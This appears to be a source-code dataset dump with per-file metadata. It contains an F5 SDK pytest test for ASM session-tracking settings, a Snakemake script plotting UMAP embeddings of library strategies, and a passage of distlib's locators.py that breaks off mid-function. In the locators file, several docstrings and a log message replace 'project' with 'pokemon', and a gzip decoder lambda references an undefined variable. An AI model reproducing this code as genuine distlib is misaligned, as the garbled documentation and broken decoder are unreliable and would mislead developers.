0030964604d33aa135c50d750f448c4688055868 | 3256af0d6c19732bb84b256a9f792aaf7f3d901a | /f5/bigip/tm/asm/policies/test/functional/test_session_tracking.py | 787fdfeaad06ce0b34a159e408f247c5a80fe15b | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] | permissive | F5Networks/f5-common-python | 73e33ea489d989399d205077163f24ce584d83b9 | 3050df0079c2426af99b9a1b8f93d0b512468ff4 | refs/heads/development | 2023-08-29T10:11:23.713392 | 2022-09-21T02:45:03 | 2022-09-21T02:45:03 | 45,062,555 | 286 | 180 | Apache-2.0 | 2023-05-12T23:13:03 | 2015-10-27T18:48:06 | Python | UTF-8 | Python | false | false | 2,340 | py | # Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from distutils.version import LooseVersion
from f5.sdk_exception import UnsupportedOperation
@pytest.mark.skipif(
LooseVersion(pytest.config.getoption('--release')) < LooseVersion('11.6.0'),
reason='This collection is fully implemented on 11.6.0 or greater.'
)
class TestSessionTracking(object):
def test_update_raises(self, policy):
with pytest.raises(UnsupportedOperation):
policy.session_tracking.update()
def test_load(self, policy):
r1 = policy.session_tracking.load()
assert r1.kind == 'tm:asm:policies:session-tracking:session-awareness-settingsstate'
assert r1.sessionTrackingConfiguration['enableSessionAwareness'] is False
tmp_2 = {'enableSessionAwareness': True}
r1.modify(sessionTrackingConfiguration=tmp_2)
assert r1.sessionTrackingConfiguration['enableSessionAwareness'] is True
r2 = policy.session_tracking.load()
assert r1.kind == r2.kind
assert r1.sessionTrackingConfiguration == r2.sessionTrackingConfiguration
def test_refresh(self, policy):
r1 = policy.session_tracking.load()
assert r1.kind == 'tm:asm:policies:session-tracking:session-awareness-settingsstate'
assert r1.sessionTrackingConfiguration['enableSessionAwareness'] is False
r2 = policy.session_tracking.load()
assert r1.kind == r2.kind
assert r1.sessionTrackingConfiguration == r2.sessionTrackingConfiguration
tmp_2 = {'enableSessionAwareness': True}
r2.modify(sessionTrackingConfiguration=tmp_2)
assert r2.sessionTrackingConfiguration['enableSessionAwareness'] is True
r1.refresh()
assert r1.sessionTrackingConfiguration == r2.sessionTrackingConfiguration
| [
"caphrim007@gmail.com"
] | caphrim007@gmail.com |
3dacd79b61a449dd121c4692ecef1e73c0a3611d | 779291cb83ec3cab36d8bb66ed46b3afd4907f95 | /library_strategy-wf/scripts/plot_umap_library_strategy.py | 8893a1ca40907af4f128ed47502fc90d159e6127 | [] | no_license | Shengqian95/ncbi_remap | ac3258411fda8e9317f3cdf951cc909cc0f1946e | 3f2099058bce5d1670a672a69c13efd89d538cd1 | refs/heads/master | 2023-05-22T06:17:57.900135 | 2020-11-01T17:16:54 | 2020-11-01T17:16:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,713 | py | """UMAP of Library Strategy"""
import sys
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
sys.path.insert(0, "../src")
from ncbi_remap.plotting import style_use
CATEGORIES = ["RNA-Seq", "EST", "WGS", "ChIP-Seq", "Other"]
COLORS = ["C0", "C1", "C2", "C4", "lightgray"]
ZORDER = [4, 3, 2, 1, 0]
SCATTER_STYLE = dict(s=10, edgecolors="w", linewidths=0.2, rasterized=True)
def main():
style_use(snakemake.params.get("style", "sra"))
embeddings = wrangle_data()
ax = plot(embeddings)
plt.savefig(snakemake.output[0])
def wrangle_data():
labels = (
pd.read_parquet(snakemake.input.labels)
.library_strategy.squeeze()
.map(lambda x: x if x in CATEGORIES else "Other")
)
return pd.read_parquet(snakemake.input.umap).join(labels)
def plot(embeddings):
for cat, color, zorder in zip(CATEGORIES, COLORS, ZORDER):
df = embeddings.query(f"library_strategy == '{cat}'")
plt.scatter(df.UMAP1, df.UMAP2, c=color, label=cat, zorder=zorder, **SCATTER_STYLE)
ax = plt.gca()
ax.set(xlabel="UMAP 1", ylabel="UMAP 2")
sns.despine(ax=ax, left=True, bottom=True)
ax.yaxis.set_visible(False)
ax.xaxis.set_visible(False)
plt.legend(loc="upper left")
return ax
if __name__ == "__main__":
if "snakemake" not in locals() or not hasattr(snakemake, "scriptdir"):
from ncbi_remap.mock import MockSnake
snakemake = MockSnake(
input=dict(
umap="../../output/library_strategy-wf/umap_prealn_features.parquet",
labels="../../output/library_strategy-wf/sra_strategy_selection.parquet",
),
output="",
)
main()
| [
"justin.m.fear@gmail.com"
] | justin.m.fear@gmail.com |
86ccac53d2e8d1436a9fb4a079327e43ed7003ff | 10e8fa6e43a54b3bbb89326a7d5786d50a625551 | /01. Defining Classes/venv/Lib/site-packages/pip-19.0.3-py3.8.egg/pip/_vendor/distlib/locators.py | de2440059a7e4ad45ca927e69469f28ad6651090 | [] | no_license | ramona-2020/Python-OOP | cbc7e5fadfdc907e51c83313e0ffb1f4f5f83f70 | 7404908f50d30c533f0fca2fd08d0290526686a5 | refs/heads/master | 2023-03-20T18:43:18.389720 | 2020-06-07T15:20:00 | 2020-06-07T15:20:00 | 523,400,905 | 1 | 0 | null | 2022-08-10T15:38:09 | 2022-08-10T15:38:08 | null | UTF-8 | Python | false | false | 51,828 | py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, string_types, build_opener,
HTTPRedirectHandler as BaseRedirectHandler, text_type,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata, MetadataInvalidError
from .util import (cached_property, parse_credentials, ensure_slash,
split_filename, get_project_data, parse_requirement,
parse_name_and_version, ServerProxy, normalize_name)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)
HASHER_HASH = re.compile(r'^(\w+)=([a-f0-9]+)')
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
try:
return client.list_packages()
finally:
client('close')()
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ('location', 'uri'):
if key in headers:
newurl = headers[key]
break
if newurl is None: # pragma: no cover
return
urlparts = urlparse(newurl)
if urlparts.scheme == '':
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, 'replace_header'):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distributions.
"""
source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
binary_extensions = ('.egg', '.exe', '.whl')
excluded_extensions = ('.pdf',)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + ('.whl',)
def __init__(self, scheme='default'):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distributions on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
self.errors = queue.Queue()
def get_errors(self):
"""
Return any errors which have occurred.
"""
result = []
while not self.errors.empty(): # pragma: no cover
try:
e = self.errors.get(False)
result.append(e)
except self.errors.Empty:
continue
self.errors.task_done()
return result
def clear_errors(self):
"""
Clear any errors which may have been logged.
"""
# Just get the errors and throw them away
self.get_errors()
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given pokemon, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError('Please implement in the subclass')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Please implement in the subclass')
def get_project(self, name):
"""
For a given pokemon, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None: # pragma: no cover
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
self.clear_errors()
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given pokemon release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith('.whl')
is_downloadable = basename.endswith(self.downloadable_extensions)
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (t.scheme == 'https', 'pypi.python.org' in t.netloc,
is_downloadable, is_wheel, compatible, basename)
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug('Not replacing %r with %r', url1, url2)
else:
logger.debug('Replacing %r with %r', url1, url2)
return result
def split_filename(self, filename, project_name):
"""
Attempt to split a filename in pokemon name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a pokemon (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
return normalize_name(name1) == normalize_name(name2)
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith('egg='): # pragma: no cover
logger.debug('%s: version hint in fragment: %r',
project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == '/': # pragma: no cover
path = path[:-1]
if path.endswith('.whl'):
try:
wheel = Wheel(path)
if not is_compatible(wheel, self.wheel_tags):
logger.debug('Wheel not compatible: %s', path)
else:
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
'name': wheel.name,
'version': wheel.version,
'filename': wheel.filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
'python-version': ', '.join(
['.'.join(list(v[2:])) for v in wheel.pyver]),
}
except Exception as e: # pragma: no cover
logger.warning('invalid path for wheel: %s', path)
elif not path.endswith(self.downloadable_extensions): # pragma: no cover
logger.debug('Not downloadable: %s', path)
else: # downloadable extension
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[:-len(ext)]
t = self.split_filename(path, project_name)
if not t: # pragma: no cover
logger.debug('No match for pokemon/version: %s', path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
'name': name,
'version': version,
'filename': filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
#'packagetype': 'sdist',
}
if pyver: # pragma: no cover
result['python-version'] = pyver
break
if result and algo:
result['%s_digest' % algo] = digest
return result
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at keys of the form
'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
for algo in ('sha256', 'md5'):
key = '%s_digest' % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop('name')
version = info.pop('version')
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info['url']
result['digests'][url] = digest
if md.source_url != info['url']:
md.source_url = self.prefer_url(md.source_url, url)
result['urls'].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None: # pragma: no cover
raise DistlibException('Not a valid requirement: %r' % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
versions = self.get_project(r.name)
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ('urls', 'digests'):
continue
try:
if not matcher.match(k):
logger.debug('%s did not match %r', matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
else:
logger.debug('skipping pre-release '
'version %s of %s', k, matcher.name)
except Exception: # pragma: no cover
logger.warning('error matching %s with %r', matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug('sorted list: %s', slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get('urls', {}).get(version, set())
d = {}
sd = versions.get('digests', {})
for url in result.download_urls:
if url in sd: # pragma: no cover
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distributions. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client.release_data(name, v)
metadata = Metadata(scheme=self.scheme)
metadata.name = data['name']
metadata.version = data['version']
metadata.license = data.get('license')
metadata.keywords = data.get('keywords', [])
metadata.summary = data.get('summary')
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info['url']
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info['url']
digest = self._get_digest(info)
result['urls'].setdefault(v, set()).add(url)
result['digests'][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
url = urljoin(self.base_url, '%s/json' % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d['info']
md.name = data['name']
md.version = data['version']
md.license = data.get('license')
md.keywords = data.get('keywords', [])
md.summary = data.get('summary')
dist = Distribution(md)
dist.locator = self
urls = d['urls']
result[md.version] = dist
for info in d['urls']:
url = info['url']
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result['urls'].setdefault(md.version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# Now get other releases
for version, infos in d['releases'].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info['url']
odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result['urls'].setdefault(version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
self.errors.put(text_type(e))
logger.exception('JSON fetch failed: %s', e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile("""
(rel\\s*=\\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\\s\n]*))\\s+)?
href\\s*=\\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\\s\n]*))
(\\s+rel\\s*=\\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\\s\n]*)))?
""", re.I | re.S | re.X)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path),
params, query, frag))
result = set()
for match in self._href.finditer(self.data):
d = match.groupdict('')
rel = (d['rel1'] or d['rel2'] or d['rel3'] or
d['rel4'] or d['rel5'] or d['rel6'])
url = d['url1'] or d['url2'] or d['url3']
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
'deflate': zlib.decompress,
'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(d)).read(),
'none': lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads you want to do I/O,
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
self.platform_check = False # See issue #112
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
t.setDaemon(True)
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, '%s/' % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug('Queueing %s', url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(r'\b(linux_(i\d86|x86_64|arm\w+)|'
r'win(32|_amd64)|macosx_?\d+)\b', re.I)
def _is_platform_dependent(self, url):
"""
Does an URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
def _process_download(self, url):
"""
See if an URL is a suitable download for a pokemon.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self.platform_check and self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug('process_download: %s -> %s', url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(self.source_extensions + self.binary_extensions +
self.excluded_extensions):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ('homepage', 'download'):
result = False
elif scheme not in ('http', 'https', 'ftp'):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(':', 1)[0]
if host.lower() == 'localhost':
result = False
else:
result = True
logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
try:
self._seen.add(link)
if (not self._process_download(link) and
self._should_queue(link, url, rel)):
logger.debug('Queueing %s from %s', link, url)
self._to_fetch.put(link)
except MetadataInvalidError: # e.g. invalid versions
pass
except Exception as e: # pragma: no cover
self.errors.put(text_type(e))
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
#logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
Get the HTML for an URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), 'index.html')
if url in self._page_cache:
result = self._page_cache[url]
logger.debug('Returning %s from cache: %s', url, result)
else:
host = netloc.split(':', 1)[0]
result = None
if host in self._bad_hosts:
logger.debug('Skipping %s due to bad host %s', url, host)
else:
req = Request(url, headers={'Accept-encoding': 'identity'})
try:
logger.debug('Fetching %s', url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug('Fetched %s', url)
headers = resp.info()
content_type = headers.get('Content-Type', '')
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get('Content-Encoding')
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = 'utf-8'
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError: # pragma: no cover
data = data.decode('latin-1') # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception('Fetch failed: %s: %s', url, e)
except URLError as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile('<a href=[^>]*>([^<]+)<')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException('Unable to get %s' % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
class DirectoryLocator(Locator):
"""
This class locates distributions in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
is searched,
"""
self.recursive = kwargs.pop('recursive', True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path): # pragma: no cover
raise DistlibException('Not a directory: %r' % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
data = get_project_data(name)
if data:
for info in data.get('files', []):
if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
continue
# We don't store summary in pokemon metadata as it makes
# the data bigger for no benefit during dependency
# resolution
dist = make_dist(data['name'], info['version'],
summary=data.get('summary',
'Placeholder for summary'),
scheme=self.scheme)
md = dist.metadata
md.source_url = info['url']
# TODO SHA256 digest
if 'digest' in info and info['digest']:
dist.digest = ('md5', info['digest'])
md.dependencies = info.get('requirements', {})
dist.exports = info.get('exports', {})
result[dist.version] = dist
result['urls'].setdefault(dist.version, set()).add(info['url'])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distributions in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {'urls': {}, 'digests': {}}
else:
result = {
dist.version: dist,
'urls': {dist.version: set([dist.source_url])},
'digests': {dist.version: set([None])}
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop('merge', False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get('urls', {})
digests = result.get('digests', {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get('urls')
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get('digests')
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
